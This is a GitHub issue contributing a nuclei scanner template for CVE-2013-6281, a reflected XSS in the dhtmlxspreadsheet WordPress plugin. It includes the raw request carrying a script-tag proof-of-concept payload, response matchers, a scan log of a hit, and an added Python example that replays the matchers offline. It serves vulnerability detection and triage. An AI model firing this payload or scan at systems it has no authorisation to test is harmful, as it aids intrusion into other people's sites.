projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS #4439

Closed random-robbie closed 2 years ago

random-robbie commented 2 years ago
id: CVE-2013-6281

info:
  name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
  author: random-robbie
  severity: medium
  description: The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
  reference:
    - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bfc
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
    - https://www.securityfocus.com/bid/63256/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2013-6281
    cwe-id: CWE-79
  tags: cve,cve2013,wordpress,xss,wp-plugin

requests:
  - raw:
      - |
        GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1);</script>"

      - type: word
        part: body
        words:
          - "dhx_rel_path"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

nuclei --target http://xxxxx -t CVE-2013-6281.yaml

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.0

        projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.0 (outdated)
[INF] Using Nuclei Templates 9.0.1 (latest)
[INF] Templates added in last update: 23
[INF] Templates loaded for scan: 1
[2022-05-18 13:54:40] [CVE-2013-6281] [http] [medium] http://zzzzzzz/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(1);%3C/script%3E
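
For triaging hits from the template above, this added example (not part of the original issue or of the nuclei project) re-implements its four AND-combined matchers offline and runs them over constructed responses, showing which matcher rejects an HTML-encoded reflection, a non-plugin page, a non-HTML response and a non-200 status. The `evaluate` and `page` helpers and all sample responses are assumptions made for illustration; only the two matcher strings come from the template.

```python
# Added example: offline re-implementation of the template's four matchers.
# All responses below are constructed for illustration, not captured traffic.
import html

PAYLOAD = "<script>alert(1);</script>"   # word from the template's first matcher
MARKER = "dhx_rel_path"                  # word from the template's second matcher


def evaluate(status, headers, body):
    """Return each matcher's result plus the AND-combined verdict."""
    # Assumption for this sketch: the 'header' part is all headers joined as text.
    header_blob = "\n".join(f"{k}: {v}" for k, v in headers.items())
    checks = {
        "payload_in_body": PAYLOAD in body,       # unencoded reflection only
        "marker_in_body": MARKER in body,         # second body word matcher
        "html_content_type": "text/html" in header_blob,
        "status_200": status == 200,
    }
    checks["match"] = all(checks.values())        # matchers-condition: and
    return checks


def page(reflected):
    # Hypothetical stand-in for the plugin page; only MARKER is from the template.
    return f'<html><script>var dhx_rel_path = "./";</script><div>{reflected}</div></html>'


HTML_CT = {"Content-Type": "text/html; charset=UTF-8"}
SAMPLES = {
    "vulnerable": (200, HTML_CT, page(PAYLOAD)),
    "encoded": (200, HTML_CT, page(html.escape(PAYLOAD))),      # output-encoded
    "other_page": (200, HTML_CT, f"<html>{PAYLOAD}</html>"),    # no marker
    "json_echo": (200, {"Content-Type": "application/json"}, page(PAYLOAD)),
    "not_found": (404, HTML_CT, page(PAYLOAD)),
}

if __name__ == "__main__":
    for name, (status, headers, body) in SAMPLES.items():
        result = evaluate(status, headers, body)
        failed = [k for k, v in result.items() if k != "match" and not v]
        print(f"{name:11} match={result['match']} failed={failed}")
```

The `encoded` case is the one to check after remediation: once the `page` parameter is HTML-escaped on output, the first matcher no longer fires and the template stops reporting the host.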

princechaddha commented 2 years ago

Hello @random-robbie, thank you so much for sharing this template with the community and contributing to this project 🍻